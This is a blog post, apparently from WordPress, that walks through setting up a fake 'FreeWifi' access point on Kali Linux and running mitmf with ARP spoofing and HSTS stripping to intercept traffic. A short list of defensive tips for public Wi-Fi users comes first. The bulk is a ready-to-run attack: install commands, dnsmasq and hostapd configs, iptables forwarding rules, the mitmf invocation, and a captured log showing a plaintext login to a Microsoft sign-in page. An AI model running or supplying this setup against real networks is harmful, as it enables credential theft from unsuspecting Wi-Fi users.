Evil AP + HSTS Bypass

wifiConnecting to a Wi-Fi network can be risky because someone could be manipulating and intercepting your data as it travels through the network. Hackers often use the below approach (or something similar) to broadcast a fake access point with a name that lures you to connect (i.e. Starbucks Wi-Fi) with the offer of free Internet. Once you’ve connected, it’s significantly easier for an attacker to control the flow of the data across the network. While certain browsers are patching to prevent against attacks like this (Chrome is doing a good job), I was able to get a number of sites (facebook.com for example) to load on a fully patched IE 11 and also Safari as well. The best recommendations I can make to prevent falling victim to this type of attack is:

1. Don’t use public Wi-Fi. Use the hotspot on your phone instead.
2. If you must use public Wi-Fi, avoid logging to sites like Facebook or your corporate email
3. Keep your web browser patched
4. Always make sure you see “https” in the URL bar, a lock, or a green bar (or all of the above)

Evil AP + HSTS Bypass:

What you’ll need:
Kali Linux (my distro of choice for something like this)
External USB wifi adapter (assuming wlan0)

Download the required tools:
apt-get install dnsmasq <– DNS/DHCP
apt-get install hostapd <– Broadcasting Fake/Evil AP
apt-get install mitmf <– Man in the middle framework

Create a dnsmasq.conf file:
nano /etc/dnsmasq.conf
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
log-queries
log-dhcp

Create/modify hostapd.conf in /etc/hostapd to read:
interface=wlan0
ssid=FreeWifi
channel=1

Make sure you have a working internet on an interface (like eth0). This is required if your want your victim to get online after the MiTM attack.
ifconfig wlan0 10.0.0.1/24 up
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

hostapd /etc/hostapd/hostapd.conf
service dnsmasq start

mitmf -i wlan0 –arp –spoof –hsts –gateway=10.0.0.1

The following was captured from IE 11 (notice the underlined plaintext username/password):

2016-02-11 23:43:52 10.0.0.55 [type:IE 11.0 os:Windows 8.1] Zapped a strict-trasport-security header
2016-02-11 23:43:56 10.0.0.55 POST Data (login.microsoftonline.com):
login=test@test.com&passwd=asdfasdf&ctx=rQIIAbNSzigpKSi20tcvyC8qSczRy09Ly0xO1UvOz9XLL0rPTAGxioS4BDISJqleffbQvfvflqDFbgt9VjGq4dSpn5OYl5KZl66XWFxQcYGRsYuJxdDA2HgTE6uvs6-T5wmmCWflbjEJ-hele6aEF7ulpqQWJZZk5uc9YuINLU4t8s_LqQzJz07Nm8TMl5OfnpkXX1yUFp-Wk18OFAAaX5CYXBJfkpmcnVqyi1kl1TDVPDkl1VzXxMggWdckxcxA19IoJUnX2NDcMtXcyDAlOc38AMuGkAssAj9YGHdx2hLnbPuSxKL01BJbVaO0lNS0xNKcErAwAA2&flowToken=AAABAAEAiL9Kn2Z27UubvWFPbm0gLSXQWl9vmwMOGzTJKDRZq5FdQ6SApcMCmMEZx-GPxr2lxnGuSkEa2gPOCK56YVuH7S-Y7RcQ5tAqwKBAS1RRSYsgAA&n1=89281&n2=-1455252118000&n3=-1455252118000&n4=90539&n5=90539&n6=90539&n7=90539&n8=NaN&n9=90539&n10=90540&n11=90540&n12=90617&n13=90540&n14=91805&n15=103&n16=91910&n17=91911&n18=91942&n19=420.3540455882576&n20=1&n21=1&n22=1455252213955.1806&n23=1&n24=1042.5330603926722&n25=0&n26=0&n27=0&n28=0&n29=-1455252209777&n30=-1455252209777&n31=0&n32=0&n33=0&n34=0&n35=0&n36=0&n37=0&n38=0&n39=0&n40=3152.197647642159&n41=3668.628915268915&n42=2615.5320457503562&n43=2659.820467688995&type=11&LoginOptions=3&NewUser=1&idsbho=1&PwdPad=&sso=&vv=&uiver=1&i12=0&i13=MSIE&i14=10.0&i15=1280&i16=705&i20=
2016-02-11 23:43:56 10.0.0.55 [type:IE 10.0 os:Windows 8] Sending Request: portal.office.com

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s